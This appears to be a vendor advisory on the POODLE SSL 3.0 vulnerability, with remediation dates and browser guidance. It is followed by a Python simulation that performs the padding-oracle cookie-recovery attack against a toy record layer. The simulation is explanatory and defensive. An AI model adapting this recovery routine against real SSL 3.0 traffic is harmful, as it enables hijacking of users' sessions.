Problem
A critical vulnerability known as POODLE (Padding Oracle on Downgraded Legacy Encryption) has been discovered in Secure Sockets Layer version 3.0 (SSL 3.0). Because the flaw is in the protocol itself rather than in any one implementation, it affects every server and client that negotiates SSL 3.0, including all legacy Internet browsers that still rely on it.
Essent Service Impact Analysis
Even before this announcement, following established Essent security policies, Essent disabled weak legacy encryption protocols on all Essent public web servers. SSL 3.0 remains in production only for encrypted web traffic originating from Windows XP users running Internet Explorer 6.0, so the attack surface is small. Note, however, that a server which still offers SSL 3.0 can be reached by newer browsers as well: a man-in-the-middle can interfere with the TLS handshake so that the browser retries with SSL 3.0, which is the "downgraded" in POODLE's name. Removing SSL 3.0 from the server is therefore the only complete mitigation.
Some Essent software products and services are accessed through a browser. Essent has offered SSL 3.0 to provide encrypted communications for Windows XP users and older browsers limited to SSL 3.0. The commerce products SiteBuilder™, PunchOutNow™, Direct2Decoration™ and OrderTrax™ are therefore affected. Users of the Essent Commerce Cloud™ whose sessions were negotiated over SSL 3.0 are exposed to this vulnerability under certain circumstances beyond the control of Essent. Essent Compass™ and Essent security products, such as The Netset™ Network Security Appliance, are not affected.
Guided by Essent security policies, Essent previously notified Facility Management Support (FMS) service subscribers to discontinue the use of Windows XP and outdated browsers. Subscribers that followed these guidelines throughout their organization should not be impacted.
Due to previous Essent actions and the nature of the vulnerability, the threat to Essent consumers is minimal, but Essent takes these issues very seriously. Affected systems can be upgraded, and newer encryption protocols (TLS 1.0 and later) are available. The remedies below will be implemented by Essent and will affect users of obsolete technology.
Corrective Action
SSL 3.0 will be disabled for Essent software products and services as of Monday, November 24, 2014, 12:00 am ET; the interval before that date gives users time to update their software and configurations.
Users are directed to discontinue immediately the use of Windows XP and outdated browsers. Regardless of browser version, users are directed to disable SSL 3.0 in every browser they have installed.
Users can test their browser configuration and obtain instructions for disabling SSL 3.0 in popular browsers at: https://zmap.io/sslv3/browsers.html
It is recommended that subscribers notify their customers that directly utilize Essent systems of this notice and Corrective Action.
Details
This vulnerability has been assigned the CVE identifier CVE-2014-3566, whose description reads: "The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue." "Nondeterministic" padding means that an SSL 3.0 receiver inspects only the final padding-length byte and never the padding bytes themselves, so whether a modified record is accepted depends solely on that one decrypted byte; that accept/reject signal is the padding oracle.
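The following is an added example, not Essent's code and not part of the original advisory: a stand-alone Python simulation of the SSL 3.0 CBC record layer that carries out the padding-oracle attack the CVE text describes. Everything in it is constructed for the simulation: the keys, the toy Feistel block cipher that stands in for AES/3DES (the attack relies only on CBC chaining, not on the cipher), the HMAC-SHA1 stand-in for the SSL 3.0 MAC, and the "sid=7f3a" cookie. `send_request` plays the victim's browser, which in the real attack a man-in-the-middle drives via injected script so that it repeats a request with a chosen length; `oracle` plays the server, whose accept/reject of each modified record the attacker sees on the wire.

```python
import hashlib
import hmac
import os

BLOCK = 16    # cipher block size
MAC_LEN = 20  # SSL 3.0 with a SHA-1 MAC; an HMAC-SHA1 stand-in is assumed here

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy invertible 16-byte block cipher (4-round Feistel over HMAC-SHA256).  It
# stands in for AES/3DES: the attack depends only on CBC chaining, not the cipher.
def _f(key, rnd, half):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        out.append(_xor(block_decrypt(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    return b"".join(out)

def ssl3_seal(enc_key, mac_key, plaintext):
    """One SSL 3.0-style CBC record: plaintext || MAC || padding || pad_len."""
    body = plaintext + hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    pad_len = (BLOCK - (len(body) + 1) % BLOCK) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])  # SSL 3.0: pad bytes are arbitrary
    iv = os.urandom(BLOCK)  # fresh IV models the chained CBC state of a new record
    return iv, cbc_encrypt(enc_key, iv, body)

def ssl3_open(enc_key, mac_key, iv, record):
    """Receiver side.  Only the pad-length byte is inspected, never the padding
    content; the accept/reject result is the oracle POODLE exploits."""
    body = cbc_decrypt(enc_key, iv, record)
    pad_len = body[-1]
    if pad_len >= BLOCK:
        return False
    body = body[:-(pad_len + 1)]
    msg, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(hmac.new(mac_key, msg, hashlib.sha1).digest(), tag)

def poodle_recover(secret_len, send_request, oracle, max_tries=20000):
    """Recover a secret the victim appends to attacker-chosen bytes.
    send_request(prefix_len, suffix_len) -> (iv, record) encrypting
    prefix || secret || suffix; oracle(iv, record) -> accepted or not."""
    recovered = bytearray()
    for j in range(secret_len):
        # Shift the request so that secret[j] is the last byte of block i ...
        prefix_len = (BLOCK - 1 - j) % BLOCK
        i = (prefix_len + j) // BLOCK
        # ... and so that the final block is entirely padding (pad_len == 15).
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK
        for _ in range(max_tries):
            iv, rec = send_request(prefix_len, suffix_len)
            blocks = [iv] + [rec[k:k + BLOCK] for k in range(0, len(rec), BLOCK)]
            c_prev, c_i, c_last_prev = blocks[i], blocks[i + 1], blocks[-2]
            forged = rec[:-BLOCK] + c_i  # overwrite the padding block with block i
            # Accepted (except with negligible probability) iff
            # D(c_i)[15] ^ c_last_prev[15] == 15, and D(c_i) == P_i ^ c_prev,
            # so an accept pins down P_i[15] == secret[j].
            if oracle(iv, forged):
                recovered.append((BLOCK - 1) ^ c_prev[-1] ^ c_last_prev[-1])
                break
        else:
            raise RuntimeError("oracle never accepted; check the record layout")
    return bytes(recovered)

SECRET = b"sid=7f3a"  # constructed stand-in for a session cookie the browser attaches

def demo():
    enc_key, mac_key = os.urandom(16), os.urandom(16)
    def send_request(prefix_len, suffix_len):
        # Victim browser: the attacker's script controls the request length via
        # prefix and suffix; the browser attaches the cookie the script cannot read.
        return ssl3_seal(enc_key, mac_key, b"A" * prefix_len + SECRET + b"B" * suffix_len)
    def oracle(iv, rec):
        # The server's accept/reject of the man-in-the-middle's modified record.
        return ssl3_open(enc_key, mac_key, iv, rec)
    return poodle_recover(len(SECRET), send_request, oracle)
```

Calling `demo()` returns the cookie bytes after roughly 256 oracle calls per recovered byte on average. The two properties that make this work are both visible in `ssl3_open`: the padding bytes are never checked (TLS 1.0 and later require every padding byte to equal the pad length, so a TLS receiver rejects the forged record), and the accept/reject decision is observable. Removing SSL 3.0 from the negotiation, as the Corrective Action above does, removes the oracle entirely.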